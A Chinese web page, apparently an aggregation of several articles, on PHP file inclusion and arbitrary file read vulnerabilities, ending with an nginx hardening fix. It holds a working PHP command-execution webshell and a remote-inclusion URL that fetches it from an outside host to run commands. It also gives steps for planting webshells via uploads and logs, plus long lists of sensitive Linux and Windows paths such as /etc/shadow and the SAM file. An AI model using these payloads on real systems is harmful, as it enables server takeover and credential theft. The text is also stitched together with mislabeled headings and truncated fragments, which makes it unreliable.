精华内容
下载资源
问答
  • 目录文件包含漏洞成因为什么要包含文件?如何利用这个漏洞?本地包含远程包含文件包含漏洞的防御文件包含漏洞成因文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行,代码...

    目录

            文件包含漏洞成因

            为什么要包含文件?

            如何利用这个漏洞?

            本地包含

            远程包含

            文件包含漏洞的防御

    1871eaff1d70d84fcd6b9b168d12acb1.gif文件包含漏洞成因

    文件包含漏洞是代码注入的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务器端执行,代码注入的典型代表就是文件包含File inclusion。文件包含可能会出现在jsp、php、asp等语言中。服务器通过函数去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。常见的文件包含的函数如下PHP:include() 、include_once()、require()、require_once()、fopen()、readfile()JSP/Servlet:ava.io.file()、java.io.filereader()ASP:include file、include virtual

    · Include:包含并运行指定文件,当包含外部文件发生错误时,系统给出警告,但整个php文件继续执行。

    · Require:跟include唯一不同的是,当产生错误时候,include会继续运行而require停止运行。

    · Include_once:这个函数跟include函数作用几乎相同,只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。

    · Require_once:这个函数跟require函数作用几乎相同,与include_once和include类似。

    · php.ini配置文件:allow_url_fopen=off 即不可以包含远程文件。php4存在远程包含&本地包含,php5仅存在本地包含。

    使用上面几个函数包含文件时,该文件将作为PHP代码执行,PHP内核并不在意被包含的文件是什么类型的。也就是说我们用这几个函数包含.jpg文件时,也会将其当做php文件来执行。

    1d4ac9a7d711bdbbcf2b633ddac0539c.gif为什么要包含文件

    程序员写程序的时候,不喜欢干同样的事情,也不喜欢把同样的代码(比如一些公用的函数)写几次,于是就把需要公用的代码写在一个单独的文件里面,比如 share.php,而后在其它文件需要使用时进行包含调用。在php里,我们就是使用上面列举的那几个函数来达到这个目的的,它的工作流程:如果你想在 main.php里包含share.php,我将这样写 include("share.php") ,然后就可以使用share.php中的函数了,像这个写死需要包含的文件名称的自然没有什么问题,也不会出现漏洞,那么问题到底是出在哪里呢?

    有的时候可能并不能确定需要包含哪个文件,比如看下面的代码

    if ($_GET[page]) {    include $_GET[page];else {    include "home.php";}

    上面这段代码的使用格式可能是这样的:
    http://hi.baidu.com/m4r10/php/index.php?page=main.php

    1、提交上面这个URL,在index.php中就取得这个page的值($_GET[page])。
    2、判断$_GET[page]是不是空,若不空(这里是main.php)就用include来包含这个文件。
    3、若$_GET[page]空的话就执行else,来 include "home.php" 这个文件。

    你也许要说,这样很好呀,可以按照URL来动态包含文件,多么方便呀,怎么产生漏洞的呢?问题的答案是:我们不乖巧,我们总喜欢和别人不一样,我们不会按照他的链接来操作,我们可能想自己写想包含(调用)的文件。比如下面说的!

    1d4ac9a7d711bdbbcf2b633ddac0539c.gif如何利用这个漏洞

    本地包含(LFI)

    本地包含条件:

    1. allow_url_fopen=On 

    2. 用户可以动态控制变量

    针对以上代码,比如我们会随便的写入下面这个URL:http: //hi.baidu.com/m4r10/php/index.php?page=hello.php。然后我们的index.php程序就傻傻按照上面我们说得步骤去执行:取page为hello.php,然后去include(hello.php)。。。。这时问题出现了,因为我们并没有hello.php这个文件,所以它 include的时候就会报警告,类似下列信息:

    Quote:

    Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.phpon line 3

    Warning: include() [function.include]: Failed opening hello.php for inclusion (include_path=.:) in /vhost/wwwroot/php/index.php on line 3

    第一行的那个Warning就是找不到我们指定的hello.php文件,也就是包含不到我们指定路径的文件;而第二行的警告是因为前面没有找到指定文件,所以包含的时候就出警告了。

    通过报错,我们可以得知绝对路径 /vhost/wwwroot/php/
    我们可以多次探测来包含其他文件,比如指定 www.xxx.com/index.php?test=./123.txt,来读出当前路径下的123.txt,也可以使用../来进行目录跳转(在没过滤../的情况下),也可以直接指定绝对路径,读取敏感的系统文件 ,比如 www.xxx.com/index.php?test=/etc/passwd,如果目标主机没有对权限限制的很严格,或者启动Apache的权限比较高,是可以读出这个文件内容的。否则就会得到一个类似于:open_basedir restriction in effect. 的 Warning。
    如果我们可以上传文件的话,我们可以上传一句话木马,然后再包含一句话木马,再用菜刀连接拿下网站的Webshell

    本地文件包含漏洞利用技巧

    · 包含用户上传的文件 (我们上传的一句话木马等等)

    · 包含data:// 或 php://input 等伪协议

    · 包含 Session 文件

    · 包含日志文件      ( 通过构造语句让服务器报错并将一句话随报错信息写入日志;找到日志文件路径,包含此文件;用菜刀连接;拿下网站的Webshell )

    远程包含(RFI)

    远程包含条件:

    1. allow_url_include=On

    2. 用户可以动态控制变量

    我们可以指定其他URL上的一个我们写的一句话木马,然后用菜刀连接获取Webshell。

    我们还可以指定其它URL上的一个包含PHP代码的webshell来直接运行,比如,我先写一段运行命令的PHP代码,如下保存为cmd.txt(后缀不重要,只要内容为PHP格式就可以了)。

    if (get_magic_quotes_gpc()){$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);} //去掉转义字符(可去掉字符串中的反斜线字符)ini_set("max_execution_time",0); //设定针对这个文件的执行时间,0为不限制.echo "开始行";       //打印的返回的开始行提示信息passthru($_REQUEST["cmd"]);   //运行cmd指定的命令echo "结束行";       //打印的返回的结束行提示信息?>

    以上这个文件的作用就是接受cmd指定的命令,并调用passthru函数执行,把内容返回在开始行与结束行之间。把这个文件保存到我们主机的服务器上(可以是不支持PHP的主机),只要能通过HTTP访问到就可以了,例如地址如下:http://www.xxx.cn/cmd.txt,然后我们就可以在那个漏洞主机上构造如下URL来利用了:http://hi.baidu.com/m4r10/php/index.php?page=http: //www.xxx.cn/cmd.txt?cmd=ls,其中cmd后面的就是你需要执行的命令,其它常用的命令(以*UNIX为例)如下:

    · ll 列目录、文件(相当于Windows下dir)

    · pwd 查看当前绝对路径

    · whoami 查看当前用户

    · wget 下载指定URL的文件

    1d4ac9a7d711bdbbcf2b633ddac0539c.gif文件包含漏洞成因

    php中,文件包含需要配置 allow_url_include=On(远程文件包含)、allow_url_fopen=On(本地文件包含) 。所以,我们可以将其关闭,这样就可以杜绝文件包含漏洞了。但是,某些情况下,不能将其关闭,必须进行包含的话,我们可以使用白名单过滤的方法,只能包含我们指定的文件。这样,就可以杜绝文件包含漏洞了。

                

    e463fcc234befd84298819bd35433bfe.png

    d73fb097a8f25d2601ad0a149b024c1c.gif

    :梁粉

    a7d3a938b0ab5a87b96b06ea4b8dec39.pnga7d3a938b0ab5a87b96b06ea4b8dec39.png6ff84778c480a7f24d06d734e3105297.png如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)fa778d5c2310ebb6f10b0ea97c382b0f.gifa7d3a938b0ab5a87b96b06ea4b8dec39.pnga7d3a938b0ab5a87b96b06ea4b8dec39.png
    展开全文
  • 做了一个题,用到了两个知识点(别问我为什么知道,大神告诉我的), 我用到的文件包含漏洞是类似于这样的:?file=../../../../../../../../../usr/local/apache2/conf/httpd....Linux默认文件路径,对就是这个,在

    做了一个题,用到了两个知识点(别问我为什么知道,大神告诉我的),

    我用到的文件包含漏洞是类似于这样的:?file=../../../../../../../../../usr/local/apache2/conf/httpd.conf

    usr/local/apache2/conf/httpd.conf是你想要得到的文件路径,我遇到的是需要得到用户的密码

    Linux默认文件路径,对就是这个,在里边找到了

    /etc/passwd:系统用户数据库文件.

    /etc/gshadow(存放密码)

    /etc/shadow(存放密码)

    试了一下,最后出来了,这就是过程,没什么营养,但有两篇资料确实要收藏一下

    文件包含漏洞 http://drops.wooyun.org/tips/3827

    Linux默认配置文件系统路径  http://blog.chinaunix.net/uid-22133229-id-1790095.html

    展开全文
  • 文件读取漏洞路径收集

    千次阅读 2017-12-15 10:19:49
    代码在做渗透测试当中会在某些情况可以读取系统文件,例如MySQL注入当中利用load_file函数读取系统文件,或者服务器配置不当参考:新型任意文件读取漏洞的研究 这里收集一下服务器通常存在的文件,可以通过读取相关...

    代码在做渗透测试当中会在某些情况可以读取系统文件,例如MySQL注入当中利用load_file函数读取系统文件,或者服务器配置不当参考:新型任意文件读取漏洞的研究

    这里收集一下服务器通常存在的文件,可以通过读取相关敏感文件达到快速获取信息的目的。

    /etc/passwd
    /etc/shadow
    /etc/issue
    /etc/fstab
    /etc/host.conf
    /etc/motd
    /etc/ld.so.conf
    /etc/sysconfig/network-scripts/ifcfg-eth0
    /etc/sysconfig/network-scripts/ifcfg-eth1
    /var/www/htdocs/index.php
    /var/www/conf/httpd.conf
    /var/www/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/httpd/htdocs/index.php
    /var/httpd/conf/httpd.conf
    /var/httpd/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/www/index.html
    /var/www/index.php
    /opt/www/conf/httpd.conf
    /opt/www/htdocs/index.php
    /opt/www/htdocs/index.html
    /usr/local/apache/htdocs/index.html
    /usr/local/apache/htdocs/index.php
    /usr/local/apache2/htdocs/index.html
    /usr/local/apache2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.html
    /tmp/apache/htdocs/index.html
    /tmp/apache/htdocs/index.php
    /etc/httpd/htdocs/index.php
    /etc/httpd/conf/httpd.conf
    /etc/httpd/htdocs/index.html
    /www/php/php.ini
    /www/php4/php.ini
    /www/php5/php.ini
    /www/conf/httpd.conf
    /www/htdocs/index.php
    /www/htdocs/index.html
    
    /usr/local/httpd/conf/httpd.conf
    /apache/apache/conf/httpd.conf
    /apache/apache2/conf/httpd.conf
    /etc/apache/apache.conf
    /etc/apache2/apache.conf
    /etc/apache/httpd.conf
    /etc/apache2/httpd.conf
    /etc/apache2/vhosts.d/00_default_vhost.conf
    /etc/apache2/sites-available/default
    
    /etc/phpmyadmin/config.inc.php
    /etc/mysql/my.cnf
    /etc/httpd/conf.d/php.conf
    /etc/httpd/conf.d/httpd.conf
    
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/access.log
    /home/apache/conf/httpd.conf
    /home/apache2/conf/httpd.conf
    
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/apache2/error_log
    /var/log/apache2/error.log
    /var/log/apache2/access_log
    /var/log/apache2/access.log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    
    /var/log/error_log
    /var/log/error.log
    /var/log/access_log
    /var/log/access.log
    
    /usr/local/apache/logs/access_logaccess_log.old
    /usr/local/apache/logs/error_logerror_log.old
    
    /etc/php.ini
    /bin/php.ini
    /etc/init.d/httpd
    /etc/init.d/mysql
    
    /etc/httpd/php.ini
    /usr/lib/php.ini
    /usr/lib/php/php.ini
    /usr/local/etc/php.ini
    /usr/local/lib/php.ini
    /usr/local/php/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php4/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php5/lib/php.ini
    /usr/local/php5/etc/php.ini
    /usr/local/php5/php5.ini
    /usr/local/apache/conf/php.ini
    
    /usr/local/apache/conf/httpd.conf
    /usr/local/apache2/conf/httpd.conf
    
    /usr/local/apache2/conf/php.ini
    /etc/php4.4/fcgi/php.ini
    /etc/php4/apache/php.ini
    /etc/php4/apache2/php.ini
    /etc/php5/apache/php.ini
    /etc/php5/apache2/php.ini
    /etc/php/php.ini
    /etc/php/php4/php.ini
    /etc/php/apache/php.ini
    /etc/php/apache2/php.ini
    /web/conf/php.ini
    /usr/local/Zend/etc/php.ini
    /opt/xampp/etc/php.ini
    /var/local/www/conf/php.ini
    /var/local/www/conf/httpd.conf
    /etc/php/cgi/php.ini
    /etc/php4/cgi/php.ini
    /etc/php5/cgi/php.ini
    
    /php5/php.ini
    /php4/php.ini
    /php/php.ini
    /PHP/php.ini
    
    /apache/php/php.ini
    
    /xampp/apache/bin/php.ini
    /xampp/apache/conf/httpd.conf
    /NetServer/bin/stable/apache/php.ini
    /home2/bin/stable/apache/php.ini
    
    /home/bin/stable/apache/php.ini
    
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    
    /var/lib/mysql/my.cnf
    /usr/local/mysql/my.cnf
    /usr/local/mysql/bin/mysql
    /etc/mysql/my.cnf
    /etc/my.cnf
    
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    /usr/local/share/examples/php4/php.ini
    /usr/local/share/examples/php/php.ini

    1.LINUX常见路径:

    /etc/passwd
    /etc/shadow
    /etc/fstab
    /etc/host.conf
    /etc/motd
    /etc/ld.so.conf
    /var/www/htdocs/index.php
    /var/www/conf/httpd.conf
    /var/www/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/httpd/htdocs/index.php
    /var/httpd/conf/httpd.conf
    /var/httpd/htdocs/index.html
    /var/httpd/conf/php.ini
    /var/www/index.html
    /var/www/index.php
    /opt/www/conf/httpd.conf
    /opt/www/htdocs/index.php
    /opt/www/htdocs/index.html
    /usr/local/apache/htdocs/index.html
    /usr/local/apache/htdocs/index.php
    /usr/local/apache2/htdocs/index.html
    /usr/local/apache2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.php
    /usr/local/httpd2.2/htdocs/index.html
    /tmp/apache/htdocs/index.html
    /tmp/apache/htdocs/index.php
    /etc/httpd/htdocs/index.php
    /etc/httpd/conf/httpd.conf
    /etc/httpd/htdocs/index.html
    /www/php/php.ini
    /www/php4/php.ini
    /www/php5/php.ini
    /www/conf/httpd.conf
    /www/htdocs/index.php
    /www/htdocs/index.html
    /usr/local/httpd/conf/httpd.conf
    /apache/apache/conf/httpd.conf
    /apache/apache2/conf/httpd.conf
    /etc/apache/apache.conf
    /etc/apache2/apache.conf
    /etc/apache/httpd.conf
    /etc/apache2/httpd.conf
    /etc/apache2/vhosts.d/00_default_vhost.conf
    /etc/apache2/sites-available/default
    /etc/phpmyadmin/config.inc.php
    /etc/mysql/my.cnf
    /etc/httpd/conf.d/php.conf
    /etc/httpd/conf.d/httpd.conf
    /etc/httpd/logs/error_log
    /etc/httpd/logs/error.log
    /etc/httpd/logs/access_log
    /etc/httpd/logs/access.log
    /home/apache/conf/httpd.conf
    /home/apache2/conf/httpd.conf
    /var/log/apache/error_log
    /var/log/apache/error.log
    /var/log/apache/access_log
    /var/log/apache/access.log
    /var/log/apache2/error_log
    /var/log/apache2/error.log
    /var/log/apache2/access_log
    /var/log/apache2/access.log
    /var/www/logs/error_log
    /var/www/logs/error.log
    /var/www/logs/access_log
    /var/www/logs/access.log
    /usr/local/apache/logs/error_log
    /usr/local/apache/logs/error.log
    /usr/local/apache/logs/access_log
    /usr/local/apache/logs/access.log
    /var/log/error_log
    /var/log/error.log
    /var/log/access_log
    /var/log/access.log
    /usr/local/apache/logs/access_logaccess_log.old
    /usr/local/apache/logs/error_logerror_log.old
    /etc/php.ini
    /bin/php.ini
    /etc/init.d/httpd
    /etc/init.d/mysql
    /etc/httpd/php.ini
    /usr/lib/php.ini
    /usr/lib/php/php.ini
    /usr/local/etc/php.ini
    /usr/local/lib/php.ini
    /usr/local/php/lib/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php4/php.ini
    /usr/local/php4/lib/php.ini
    /usr/local/php5/lib/php.ini
    /usr/local/php5/etc/php.ini
    /usr/local/php5/php5.ini
    /usr/local/apache/conf/php.ini
    /usr/local/apache/conf/httpd.conf
    /usr/local/apache2/conf/httpd.conf
    /usr/local/apache2/conf/php.ini
    /etc/php4.4/fcgi/php.ini
    /etc/php4/apache/php.ini
    /etc/php4/apache2/php.ini
    /etc/php5/apache/php.ini
    /etc/php5/apache2/php.ini
    /etc/php/php.ini
    /etc/php/php4/php.ini
    /etc/php/apache/php.ini
    /etc/php/apache2/php.ini
    /web/conf/php.ini
    /usr/local/Zend/etc/php.ini
    /opt/xampp/etc/php.ini
    /var/local/www/conf/php.ini
    /var/local/www/conf/httpd.conf
    /etc/php/cgi/php.ini
    /etc/php4/cgi/php.ini
    /etc/php5/cgi/php.ini
    /php5/php.ini
    /php4/php.ini
    /php/php.ini
    /PHP/php.ini
    /apache/php/php.ini
    /xampp/apache/bin/php.ini
    /xampp/apache/conf/httpd.conf
    /NetServer/bin/stable/apache/php.ini
    /home2/bin/stable/apache/php.ini
    /home/bin/stable/apache/php.ini
    /var/log/mysql/mysql-bin.log
    /var/log/mysql.log
    /var/log/mysqlderror.log
    /var/log/mysql/mysql.log
    /var/log/mysql/mysql-slow.log
    /var/mysql.log
    /var/lib/mysql/my.cnf
    /usr/local/mysql/my.cnf
    /usr/local/mysql/bin/mysql
    /etc/mysql/my.cnf
    /etc/my.cnf
    /usr/local/cpanel/logs
    /usr/local/cpanel/logs/stats_log
    /usr/local/cpanel/logs/access_log
    /usr/local/cpanel/logs/error_log
    /usr/local/cpanel/logs/license_log
    /usr/local/cpanel/logs/login_log
    /usr/local/cpanel/logs/stats_log
    /usr/local/share/examples/php4/php.ini
    /usr/local/share/examples/php/php.ini

    2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘)

    c:\windows\php.ini
    c:\boot.ini
    c:\1.txt
    c:\a.txt
    
    c:\CMailServer\config.ini
    c:\CMailServer\CMailServer.exe
    c:\CMailServer\WebMail\index.asp
    c:\program files\CMailServer\CMailServer.exe
    c:\program files\CMailServer\WebMail\index.asp
    C:\WinWebMail\SysInfo.ini
    C:\WinWebMail\Web\default.asp
    C:\WINDOWS\FreeHost32.dll
    C:\WINDOWS\7i24iislog4.exe
    C:\WINDOWS\7i24tool.exe
    
    c:\hzhost\databases\url.asp
    
    c:\hzhost\hzclient.exe
    C:\Documents and Settings\All Users\「开始」菜单\程序\7i24虚拟主机管理平台\自动设置[受控端].lnk
    
    C:\Documents and Settings\All Users\「开始」菜单\程序\Serv-U\Serv-U Administrator.lnk
    C:\WINDOWS\web.config
    c:\web\index.html
    c:\www\index.html
    c:\WWWROOT\index.html
    c:\website\index.html
    c:\web\index.asp
    c:\www\index.asp
    c:\wwwsite\index.asp
    c:\WWWROOT\index.asp
    c:\web\index.php
    c:\www\index.php
    c:\WWWROOT\index.php
    c:\WWWsite\index.php
    c:\web\default.html
    c:\www\default.html
    c:\WWWROOT\default.html
    c:\website\default.html
    c:\web\default.asp
    c:\www\default.asp
    c:\wwwsite\default.asp
    c:\WWWROOT\default.asp
    c:\web\default.php
    c:\www\default.php
    c:\WWWROOT\default.php
    c:\WWWsite\default.php
    C:\Inetpub\wwwroot\pagerror.gif
    c:\windows\notepad.exe
    c:\winnt\notepad.exe
    C:\Program Files\Microsoft Office\OFFICE10\winword.exe
    C:\Program Files\Microsoft Office\OFFICE11\winword.exe
    C:\Program Files\Microsoft Office\OFFICE12\winword.exe
    C:\Program Files\Internet Explorer\IEXPLORE.EXE
    C:\Program Files\winrar\rar.exe
    C:\Program Files\360\360Safe\360safe.exe
    C:\Program Files\360Safe\360safe.exe
    C:\Documents and Settings\Administrator\Application Data\360Safe\360Examine\360Examine.log
    c:\ravbin\store.ini
    c:\rising.ini
    C:\Program Files\Rising\Rav\RsTask.xml
    C:\Documents and Settings\All Users\Start Menu\desktop.ini
    C:\Documents and Settings\Administrator\My Documents\Default.rdp
    C:\Documents and Settings\Administrator\Cookies\index.dat
    C:\Documents and Settings\Administrator\My Documents\新建 文本文档.txt
    C:\Documents and Settings\Administrator\桌面\新建 文本文档.txt
    C:\Documents and Settings\Administrator\My Documents\1.txt
    C:\Documents and Settings\Administrator\桌面\1.txt
    C:\Documents and Settings\Administrator\My Documents\a.txt
    C:\Documents and Settings\Administrator\桌面\a.txt
    C:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg
    E:\Inetpub\wwwroot\aspnet_client\system_web\1_1_4322\SmartNav.htm
    C:\Program Files\RhinoSoft.com\Serv-U\Version.txt
    C:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini
    C:\Program Files\Symantec\SYMEVENT.INF
    C:\Program Files\Microsoft SQL Server\80\Tools\Binn\sqlmangr.exe
    C:\Program Files\Microsoft SQL Server\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Data\master.mdf
    C:\Program Files\Microsoft SQL Server\80\Tools\HTML\database.htm
    C:\Program Files\Microsoft SQL Server\MSSQL\README.TXT
    C:\Program Files\Microsoft SQL Server\90\Tools\Bin\DdsShapes.dll
    C:\Program Files\Microsoft SQL Server\MSSQL\sqlsunin.ini
    C:\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\my.ini
    C:\Program Files\MySQL\MySQL Server 5.0\data\mysql\user.frm
    C:\Program Files\MySQL\MySQL Server 5.0\COPYING
    C:\Program Files\MySQL\MySQL Server 5.0\share\mysql_fix_privilege_tables.sql
    C:\Program Files\MySQL\MySQL Server 4.1\bin\mysql.exe
    c:\MySQL\MySQL Server 4.1\bin\mysql.exe
    c:\MySQL\MySQL Server 4.1\data\mysql\user.frm
    C:\Program Files\Oracle\oraconfig\Lpk.dll
    C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe
    C:\WINDOWS\system32\inetsrv\w3wp.exe
    C:\WINDOWS\system32\inetsrv\inetinfo.exe
    C:\WINDOWS\system32\inetsrv\MetaBase.xml
    C:\WINDOWS\system32\inetsrv\iisadmpwd\achg.asp
    C:\WINDOWS\system32\config\default.LOG
    C:\WINDOWS\system32\config\sam
    C:\WINDOWS\system32\config\system
    c:\CMailServer\config.ini
    c:\program files\CMailServer\config.ini
    c:\tomcat6\tomcat6\bin\version.sh
    c:\tomcat6\bin\version.sh
    c:\tomcat\bin\version.sh
    c:\program files\tomcat6\bin\version.sh
    C:\Program Files\Apache Software Foundation\Tomcat 6.0\bin\version.sh
    c:\Program Files\Apache Software Foundation\Tomcat 6.0\logs\isapi_redirect.log
    c:\Apache2\Apache2\bin\Apache.exe
    c:\Apache2\bin\Apache.exe
    c:\Apache2\php\license.txt
    C:\Program Files\Apache Group\Apache2\bin\Apache.exe
    /usr/local/tomcat5527/bin/version.sh
    /usr/share/tomcat6/bin/startup.sh
    /usr/tomcat6/bin/startup.sh
    c:\Program Files\QQ2007\qq.exe
    c:\Program Files\Tencent\qq\User.db
    c:\Program Files\Tencent\qq\qq.exe
    c:\Program Files\Tencent\qq\bin\qq.exe
    c:\Program Files\Tencent\qq2009\qq.exe
    c:\Program Files\Tencent\qq2008\qq.exe
    c:\Program Files\Tencent\qq2010\bin\qq.exe
    c:\Program Files\Tencent\qq\Users\All Users\Registry.db
    C:\Program Files\Tencent\TM\TMDlls\QQZip.dll
    c:\Program Files\Tencent\Tm\Bin\Txplatform.exe
    c:\Program Files\Tencent\RTXServer\AppConfig.xml
    C:\Program Files\Foxmal\Foxmail.exe
    C:\Program Files\Foxmal\accounts.cfg
    C:\Program Files\tencent\Foxmal\Foxmail.exe
    C:\Program Files\tencent\Foxmal\accounts.cfg
    C:\Program Files\LeapFTP 3.0\LeapFTP.exe
    C:\Program Files\LeapFTP\LeapFTP.exe
    c:\Program Files\GlobalSCAPE\CuteFTP Pro\cftppro.exe
    c:\Program Files\GlobalSCAPE\CuteFTP Pro\notes.txt
    C:\Program Files\FlashFXP\FlashFXP.ini
    C:\Program Files\FlashFXP\flashfxp.exe
    c:\Program Files\Oracle\bin\regsvr32.exe
    c:\Program Files\腾讯游戏\QQGAME\readme.txt
    c:\Program Files\tencent\腾讯游戏\QQGAME\readme.txt
    c:\Program Files\tencent\QQGAME\readme.txt
    C:\Program Files\StormII\Storm.exe

    3.网站相对路径:

    /config.php
    ../../config.php
    ../config.php
    ../../../config.php
    /config.inc.php
    ./config.inc.php
    ../../config.inc.php
    ../config.inc.php
    ../../../config.inc.php
    /conn.php
    ./conn.php
    ../../conn.php
    ../conn.php
    ../../../conn.php
    /conn.asp
    ./conn.asp
    ../../conn.asp
    ../conn.asp
    ../../../conn.asp
    /config.inc.php
    ./config.inc.php
    ../../config.inc.php
    ../config.inc.php
    ../../../config.inc.php
    /config/config.php
    ../../config/config.php
    ../config/config.php
    ../../../config/config.php
    /config/config.inc.php
    ./config/config.inc.php
    ../../config/config.inc.php
    ../config/config.inc.php
    ../../../config/config.inc.php
    /config/conn.php
    ./config/conn.php
    ../../config/conn.php
    ../config/conn.php
    ../../../config/conn.php
    /config/conn.asp
    ./config/conn.asp
    ../../config/conn.asp
    ../config/conn.asp
    ../../../config/conn.asp
    /config/config.inc.php
    ./config/config.inc.php
    ../../config/config.inc.php
    ../config/config.inc.php
    ../../../config/config.inc.php
    /data/config.php
    ../../data/config.php
    ../data/config.php
    ../../../data/config.php
    /data/config.inc.php
    ./data/config.inc.php
    ../../data/config.inc.php
    ../data/config.inc.php
    ../../../data/config.inc.php
    /data/conn.php
    ./data/conn.php
    ../../data/conn.php
    ../data/conn.php
    ../../../data/conn.php
    /data/conn.asp
    ./data/conn.asp
    ../../data/conn.asp
    ../data/conn.asp
    ../../../data/conn.asp
    /data/config.inc.php
    ./data/config.inc.php
    ../../data/config.inc.php
    ../data/config.inc.php
    ../../../data/config.inc.php
    /include/config.php
    ../../include/config.php
    ../include/config.php
    ../../../include/config.php
    /include/config.inc.php
    ./include/config.inc.php
    ../../include/config.inc.php
    ../include/config.inc.php
    ../../../include/config.inc.php
    /include/conn.php
    ./include/conn.php
    ../../include/conn.php
    ../include/conn.php
    ../../../include/conn.php
    /include/conn.asp
    ./include/conn.asp
    ../../include/conn.asp
    ../include/conn.asp
    ../../../include/conn.asp
    /include/config.inc.php
    ./include/config.inc.php
    ../../include/config.inc.php
    ../include/config.inc.php
    ../../../include/config.inc.php
    /inc/config.php
    ../../inc/config.php
    ../inc/config.php
    ../../../inc/config.php
    /inc/config.inc.php
    ./inc/config.inc.php
    ../../inc/config.inc.php
    ../inc/config.inc.php
    ../../../inc/config.inc.php
    /inc/conn.php
    ./inc/conn.php
    ../../inc/conn.php
    ../inc/conn.php
    ../../../inc/conn.php
    /inc/conn.asp
    ./inc/conn.asp
    ../../inc/conn.asp
    ../inc/conn.asp
    ../../../inc/conn.asp
    /inc/config.inc.php
    ./inc/config.inc.php
    ../../inc/config.inc.php
    ../inc/config.inc.php
    ../../../inc/config.inc.php
    /index.php
    ./index.php
    ../../index.php
    ../index.php
    ../../../index.php
    /index.asp
    ./index.asp
    ../../index.asp
    ../index.asp
    ../../../index.asp
    展开全文
  • nginx文件路径处理远程命令执行漏洞 详细描述: nginx是多平台的HTTP服务器和邮件代理服务器。 nginx可以被配置为以CGI的方式支持PHP的运行,nginx在处理PHP脚本文件路径的解析时存在问题。如果网站允许上传文件,...

    nginx文件路径处理远程命令执行漏洞

    详细描述: nginx是多平台的HTTP服务器和邮件代理服务器。
    nginx可以被配置为以CGI的方式支持PHP的运行,nginx在处理PHP脚本文件路径的解析时存在问题。如果网站允许上传文件,而且上传文件路径可得到,远程攻击者可以利用此漏洞上传包含恶意代码的文件并得到执行,实现以Web进程权限执行任意命令。

    解决办法:修改nginx的配置文件。
    ①首先修改 fastcgi.conf文件,改为如下内容:

    if ($request_filename ~* (.*)\.php) {
        set $php_url $1;
    }
    if (!-e $php_url.php) {
        return 403;
    }
    
    fastcgi_param  GATEWAY_INTERFACE  CGI/1.1;
    fastcgi_param  SERVER_SOFTWARE    nginx;
    
    fastcgi_param  QUERY_STRING       $query_string;
    fastcgi_param  REQUEST_METHOD     $request_method;
    fastcgi_param  CONTENT_TYPE       $content_type;
    fastcgi_param  CONTENT_LENGTH     $content_length;
    
    fastcgi_param  SCRIPT_FILENAME    $document_root$fastcgi_script_name;
    fastcgi_param  SCRIPT_NAME        $uri;
    fastcgi_param  REQUEST_URI        $request_uri;
    fastcgi_param  DOCUMENT_URI       $document_uri;
    fastcgi_param  DOCUMENT_ROOT      $document_root;
    fastcgi_param  SERVER_PROTOCOL    $server_protocol;
    
    fastcgi_param  REMOTE_ADDR        $remote_addr;
    fastcgi_param  REMOTE_PORT        $remote_port;
    fastcgi_param  SERVER_ADDR        $server_addr;
    fastcgi_param  SERVER_PORT        $server_port;
    fastcgi_param  SERVER_NAME        $server_name;
    
    # PHP only, required if PHP was built with --enable-force-cgi-redirect
    fastcgi_param  REDIRECT_STATUS    200;
    
    

    ②修改 nginx.conf文件,添加如下配置:

    添加location:

    location ~* .*\.php($|/)
    		{
          			if ($request_filename ~* (.*)\.php) {
                		set $php_url $1;
         		 }
          			if (!-e $php_url.php) {
                		return 403;
         		 }
    
        			fastcgi_pass  127.0.0.1:8098;
          			fastcgi_index index.php;
          			include fastcgi.conf;
    		}
    
    展开全文
  • 2020年11月11日,必达实验室天问安全团队依托监测平台发现微软(Microsoft)披露了Microsoft Windows 网络文件系统远程代码执行漏洞(CVE-2020-17051)。经分析,攻击者在未授权或无需与用户交互的情况下利用该漏洞执行...
  • 文件上传这个功能在大部分系统中都存在,但是要做好一个文件上传和下载功能的话就非常吃经验,因为涉及到很多的边界条件。”任意文件上传背景介绍首先,文件上传首先就要校验文件类型是否在允许范围内;比如一张图片...
